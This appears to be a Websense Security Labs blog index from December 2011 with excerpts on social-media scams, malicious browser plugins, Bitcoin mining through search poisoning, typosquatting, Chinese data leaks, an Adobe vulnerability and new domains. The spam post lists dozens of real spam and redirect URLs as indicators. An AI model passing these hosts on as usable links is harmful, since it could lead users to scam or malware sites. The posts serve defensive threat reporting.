Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

Latest Blog Posts

View all posts > 

(December 2011) Posts

Facebook launches new features

Posted: 29 Dec 2011 09:26 PM | Elisabeth Olsen | no comments


Timeline A while back, we blogged about some upcoming changes on Facebook . The new Timeline layout is now ready for release. All Facebook accounts will be updated to the new Timeline layout on December 29, 2011. You may already have noticed changes in some profiles. Timeline has been accessible to all users for a while, giving them the choice to publish or simply modify their Timelines prior to the December 29 release. We're interested to know what you think of these new Facebook features. Please enter your comments at the bottom of this blog post. And keep in mind that Websense technology can protect your Timeline from spam, malicious links, and unwanted comments. ( Read here about the security partnership with Facebook that we announced in October.) Sponsored Stories In January 2012, Facebook users will start to see their photos appear in third-party advertisements in News Feeds. Facebook’s new “ Sponsored Stories ” feature will appear in the Ticker section – a feature released earlier this year and located on the right-hand side of the Facebook page. Users will see targeted Sponsored Stories based on their friends' and their own “Page likes,” check-ins, app shares, games played, and so on. These stories are visible only to people who are already eligible to see your News Feed story. For example, if you own a small business and you want people to hear about you, you can pay to have activity posted in the Sponsored Stories column. These postings are based only on the actions of users' friends. Your business is more credible because the link comes from a friend. Facebook will implement this feature slowly, starting with one advertisement per day per user. According to a Facebook spokesperson, up to 10% of the stories appearing in the Ticker will be Sponsored Stories. As the leading web content classification and security firm, and as a security partner with Facebook, Websense tracks these trends closely. We do not see increased security risks based on Sponsored Stories, but let us know what you think.

Read more > 

Filed under: , ,

Chinese Internet Suffers the Most Serious User Data Leak in History

Posted: 27 Dec 2011 03:23 AM | Xue Yang | no comments


Last week, China's largest software programmers' Web site CSDN (China Software Developer Network) was hacked, and account information for more than 6 million users was leaked and quickly spread via the Internet. One day later, Tianya, the biggest Chinese online forum, was reportedly hacked for the account information of 40 million users. This cyber attack has continued, with several well-known sites like the Duowan game, the 7k7k game, the e-commerce sites 360buy and Dangdang, the popular dating sites like Zhenai being hacked and user data leaked. Some sites' databases have been published on the Internet and can be easily downloaded.

...

Read more > 

Filed under: , ,

Facebook scams kick it up a notch with Firefox/Chrome plugins

Posted: 20 Dec 2011 06:12 AM | Elad Sharf | no comments


Scams on Facebook are a daily thing. Websense ® Threatseeker ® Network recently detected some Facebook scams that now utilize the power of browser extensions to spread to other users' profiles. Scam pages typically utilize social engineering tricks - like enticing users with videos or offers for a free voucher, all of which lure victims to take part in the scam. Now on top of that, we've found that victims are also asked to install a browser plugin. The plugin is an integral part of how the scam is spread. Once installed, the plugin connects to a script that uses the Facebook API and then posts the scam to the victim's friends' pages. O ne of the advantages of using a plugin is the ability to persist in the victim's browsers and propagate to other profiles - that is similar to malicious Facebook applications we've seen before. We have noticed that at the moment, only Chrome and Firefox plugins are used. This is how a sample scam page looks using Chrome and Firefox browsers respectively: The code checks which browser is installed and serves the compatible malicious plugin. Chrome plugin files end with a CRX file extension and Firefox plugin files end with the XPI file extension. Chrome and Firefox plugin files come in a compressed form. Looking inside these malicious plugins reveals some code that loads a script from external websites. This code is ultimately loaded by the browser that connects to Facebook. The code posts in the victim's name on the victim's friends pages, which results in the victim further spreading the scam, spam, and possibly malware. To see the code behind the plugin of the scam shown above, take a look at these next images: Here is another example of a scam with the same concept. The next two images show a 'Cheesecake Factory' voucher scam offering to download a Chrome plugin and how the scam looks like in Facebook's news feed: Websense Advanced Classification Engine , or ACE, helps protect users from such scams.

Read more > 

Filed under: , ,

Bitcoin Miner with Black Hat SEO Poisoning Campaign

Posted: 20 Dec 2011 03:00 AM | Gianluca Giuliani | no comments


Bitcoin is a peer-to-peer currency exchange system that features a predictable currency rate. The generation of Bitcoin currency is controlled by an algorithm created by Japanese researcher Satoshi Nakamoto in 2008. Bitcoin system users are essentially "mining" for Bitcoins using their computers CPU power. Today, because of the intrinsic characteristics of the Bitcoin-generating algorithm, calculating new "coins" in a reasonable amount of time without the use of distributed computing power is very difficult. It's important to remember that Bitcoins are like real money and can be exchanged for real money. During a recent investigation, we encountered a new trend in the landscape of monetization techniques which can be triggered by the Black Hat SEO (BHSEO) poisoning campaign. What happens when BHSEO specialists meet a service offered, for example, by BitcoinPlus which is used for mining Bitcoins? Well, we should never underestimate the cleverness and the imagination of cyber criminals. Specifically, we have encountered the presence of an array of Websites that have been setup for BHSEO purposes and that are used for Bitcoin mining. Basically, this is the goal of BHSEO poisoning: reach a user for malicious purposes when that user is looking for something via a search engine.There are many ways to create a BHSEO campaign (or structure). The one most often used consists of creating and renaming a Website HTML page to be a popular keyword. So a global celebrity gossip news item can be a gold mine for anyone who wants to build a BHSEO campaign. This technique is frequently used to spread malware or some other kind of malicious content. BitcoinPlus offers a service which allows a registered user to mine "coins" using some JavaScript that is added to their Website. This essentially means that the computer's CPU power of any visitor of such Website will be used to generate Bitcoins for the Bitcoin account owner. The code, provided by BitCoinPlus, is shown in the following screen shot, this is the code that is included in the BHSEO Website to generate Bitcoins: Essentially the code requires the support of the minimal jQuery library, the call to the mining JavaScript code, and the registration of the BitcoinPlus user account. The following Java applet shows the miner.js call: A brief analysis of this JAR file shows the code that calculates the amount of time necessary for any Web client visit to mine Bitcoins, as shown in the following code snippet: Up to this point, nothing illegal has happened. But what would happen if this script is used for malicious intent? During our analysis using the Websense ThreatSeeker ™ Network, we detected several Websites setup with the JavaScript snippet shown above. The screenshot below shows some of the Websites that are part of the BHSEO campaign, explained earlier in this blog: The keywords relate to a variety of topics: adult content, electronic devices, hacking, software, and so...

Read more > 

Filed under: , ,

Lady Gaga's Twitter account tweeting links to survey scam

Posted: 19 Dec 2011 06:40 PM | Anonymous | no comments


The Twitter account of famous singer Lady Gaga has apparently been hacked. It's being used by attackers to lure her more than 17 million followers to click on a link: After a number of redirects, the link ultimately leads to a survey scam that is designed to harvest personal information: The first link uses the URL shortener bit.ly, which has suspended the link as " being potentially problematic." Although this should keep most users away from the scam for now, the attackers are likely to post new tweets that include phishing or malicious URLs as long as they have control of the account. The Twitter community has responded by sharing the fact that Lady Gaga's account shouldn't be trusted. This led to #stophackinggaga as a trending Twitter topic at the time this post was written. As always, be careful of links you click on Twitter, even when they appear to come from trusted accounts. Customers who are using Websense security products are protected from this spam campaign through our ACE technology and TRITON™ solutions .

Read more > 

Filed under: , ,

"Lost Weight" Spam Campaign Spreading on Facebook and ibibo

Posted: 15 Dec 2011 11:20 PM | uwang | no comments


Websense® ThreatSeeker® Network detects that a new spam campaign is spreading on Facebook and ibibo (a popular game site in India). The content of the spam messages is: " Lost 30 pounds in just 4 weeks all thanks to hcg. Check it out: http://spam_url ". We have seen a number of similar spam campaigns on Facebook such as, "Sexiest Video Ever" on Facebook ", " Osama bin Laden scams on Facebook ", etc. But, unlike previous campaigns which took advantage of a hot topic to lure visitors to click the link in the spam post, here the attackers publish a comment in the name of the account owner: "Never thought losing weight could be so easy!!!". With this method, some of the account owner's friends can be tricked into clicking the spam link: For the Facebook version of the attack, the attackers abused the blogspot.com service. Here are some of the URLs used for the attack: http://learn-how-to-be-thinghhfwi.blogspot.com http://learn-how-to-be-thing3lk8o.blogspot.com http://find-out-how-to-be-thing5nuhl.blogspot.com http://find-out-how-to-be-thingpmgbg.blogspot.com http://learn-how-to-be-thingiihfz.blogspot.com http://learn-how-to-be-thing4m4wr.blogspot.com http://learn-how-to-be-thingrebrl.blogspot.com http://learn-how-to-get-thingqvg34.blogspot.com http://learn-how-to-be-thing0jk0h.blogspot.com http://find-out-how-to-get-thingczign.blogspot.com The spam link redirects victims to another spam site. At the moment, the spam site is unavailable, but the attackers can always update the sites with malicious content. http://ad2ac.com/?s=15yy1 http://zcwqa2.com/?s=15yy2 The spam link used in Ibibo is new registered sites. Still unavailable now. http://diet-news.m9q.report.qfz.htttp96.com/ http://diet-news.1tc.report.n8e.httpai.com/ http://diet-news.gxf.report.wxb.htttp92.com/ http://diet-news.ejp.report.3ok.http1m.com/ http://diet-news.z1o.report.yl9.httpv1.com/ http://diet-news.e86.report.i63.http1n.com/ http://diet-news.d8b.report.1b2.httpao.com/ http://diet-news.4rv.report.ezi.httpum.com/ http://diet-news.ice.report.75l.httpmn8.com/ http://diet-news.wja.report.95k.htttp45.com/ http://diet-news.aki.report.uks.httpy4.com/ http://diet-news.5fh.report.yeb.http1c.com/ http://diet-news.ly8.report.o4i.httpvv8.com/ Websense customers are protected from these threats by ACE, our Advanced Classification Engine .

Read more > 

Filed under: , ,

From ".com" to ".anything"

Posted: 12 Dec 2011 06:06 PM | RM | no comments


You may already know about the recent launch of the .xxx domain that is designed for websites with adult content. That is just the tip of the iceberg. ICANN (Internet Corporation for Assigned Names and Numbers), the organization that coordinates the Internet’s addressing system, has announced a major evolution in the naming possibilities for generic top-level domains (gTLDs). Most Internet users are familiar with current gTLDs such as .com, .org, .edu, and so forth. Of course, there are also ccTLDs, two-letter country-code top-level domains, such as .us, .uk, .fr, .il (about 250 at the moment). Beginning in 2012, ICANN is planning to allow any word in any alphabet (including non- ASCII ) to be used as a gTLD, opening up the possibility for .pizza, .chocolate, .vodka, .מזלטוב ("Good luck" in Hebrew), and just about anything else you can imagine. ICANN anticipates that hundreds of new gTLDs will be added to the current 22. But don’t expect to see .fred or .smithfamily anytime soon, since the process for obtaining a gTLD is much more complex and expensive than getting a vanity plate for the family car. You’ll need to jump through a lot of legal and regulatory hoops, survive multiple reviews and objections, and pony up at least U.S. $185,000 in evaluation fees. Despite all this, ICANN expects to receive about 400-500 applications in the first round of applications (submissions will be accepted from January 12 through April 12, 2012). If you feel inspired to create a new ".something" and have a lot of spare change, check out the Applicant Guidebook for detailed information on how to apply for a new generic top-level domain. What name would you be willing to pay $185,000 to have? No matter what names are registered, you can bet that through various means, cybercrime syndicates will figure out how to take advantage of the situation. Websense® customers will still be protected with our Advanced Classification Engine , ACE, that will filter websites based on the content of the site and not necessarily on the top-level domain.

Read more > 

Filed under:

A typosquat hostname list for Xmas

Posted: 08 Dec 2011 05:06 PM | Elad Sharf | no comments


A few weeks ago, we published a blog about typosquatting. This time, we're going to give an actual example of typosquat hosts found in the wild and show how typosquatting scams work. We'll take you through a typosquatting campaign that abuses tenth of known brands and includes thousands of registered typosquat hosts (a typosquat hive). After that, we'll offer a list that includes hundreds of typosquatting hosts from that hive, all of which can be found in the wild. The list is free to download for any of you who are into IT security -- so this Xmas can be a bit safer. In this blog we'll cover: - A typosquatting example: If you make the wrong typo, where will it take you, and how does it work? - A typosquat hive example from the wild - how does it work, which brands are targeted, and where will the typosquat take you? - Which countries the typos are coming from with this campaign. - Where the scam infrastructure is located. - A list of hundreds of hosts used for typosquatting found in the wild. The list is free to download. A typosquatting example: If you make the wrong typo, where does it take you? We've all made typing mistakes when typing a Web address in our browser. In better cases, we get nothing more than a 404 not found error. In worse cases, we might be redirected to a scam site or a malware/exploit site. Usually, in the case of typosquatting-based cyber crimes, the victim that mistakenly made the typo is redirected to a scam site that tries to take advantage of the victim's state of mind. For example, victims who thought they typed in the right Web address might not notice if they see a scam site with the look and behavior that they expect, and that can profit the scammer. Victims might see a site with the same color scheme and theme as the brand or site they intended to go to, hand-in-hand with false congratulations on being a random winner who will receive a prize for completing a short survey. The following video shows how it works: A "typosquat hive" example from the wild: How does it work? Typosquatting is illegal in the US. Nonetheless, a lot of typosquatting sites are hosted in the US. As an example, at the bottom of this blog, you'll find a list of hundreds of hosts that are part of a typosquat hive (the hive itself contains thousands of hosts), and all of them are hosted in the US. We call it a hive because all of the listed hosts have a connection, and were most likely set up by the same cybercriminals. How does this specific scam work? Please refer to the image below, and we'll take you step-by-step right through it. The typosquat hive (marked 1 in the diagram ) consists of many hostnames registered by the cybercriminals. (If you have a look through the list linked at the bottom of the blog, you'll find those names there.) The list consists of a lot of names that target very well known brands. The cybercriminals are interested in breadth -- they want to target as many well-known brands...

Read more > 

Filed under: , ,

Adobe Reader and Acrobat Vulnerability (CVE-2011-2462)

Posted: 07 Dec 2011 07:39 PM | Chris Astacio | no comments


Yesterday, Adobe released a Security Advisory warning about a vulnerability in Adobe Reader and Acrobat. Adobe rated this vulnerability "critical," because it may allow an attacker to execute code remotely and take control of an affected system. Adobe is currently working on a fix and planning to roll that fix out next week for the 9.x versions of its software for Windows. Because Adobe Reader X and Adobe Acrobat X have a sandboxing mechanism called Protected View , these versions will not allow code to be executed remotely. So for these newer X versions of the affected software, Adobe will issue a fix in its next quarterly update, currently scheduled for January 10, 2012. Adobe lists Protected View as a way to safeguard your system against this threat. Please be sure to use the X version of Adobe software and verify that Protected View is enabled. The Mitigations section of the Adobe Security Advisory explains how to do this for the X versions. Websense Security Labs™ is aware of reports that this vulnerability has been used in the wild. We have updated our Advanced Classification Engine , ACE, to help protect against and look for any other possible attacks in the wild.

Read more > 

Filed under: ,

Let's be adult about it. xxx

Posted: 06 Dec 2011 03:31 PM | Elisabeth Olsen | no comments


On 12/6/2011 at 11 am EST, more than 100,000 Web sites are expected to go live with the new .xxx domain. XXX was approved as a "top-level domain" address last year by ICANN , and was set up to make it easier to identify adult sites. However, it has also had some unintended consequences. For example, if you own Acme Explosives and have operated acmeexplosives.com for years, you might want to register acmeexplosives.xxx too (just to make sure no one else registers it for a porn site, possibly besmirching your reputation with the demolition crowd). You could leave it as a null site, or you could redirect your new .XXX site to your standard .COM site. Therein lies the rub: Websense will automatically categorize all .XXX sites as “Sex”. But if you are Acme, you might prefer to have people redirected to your commercial site, rather than having them run into a block page. Have no fear. If you have registered a .XXX page that redirects to a non-adult site and would prefer to have it categorized to something that reflects the true content, just send your request to suggest@websense.com or use the online submission tool. Websense customers automatically protected A database download has been pushed out to all Websense customers, timed to take effect before the .XXX top-level domain goes live. Any product, from filtering to TRITON Enterprise, will have this domain categorized in their database as "Sex." We may have some folks out there using old, unsupported versions of Websense that may be in for a surprise, but it shouldn't affect any current customers.

Read more > 

Filed under: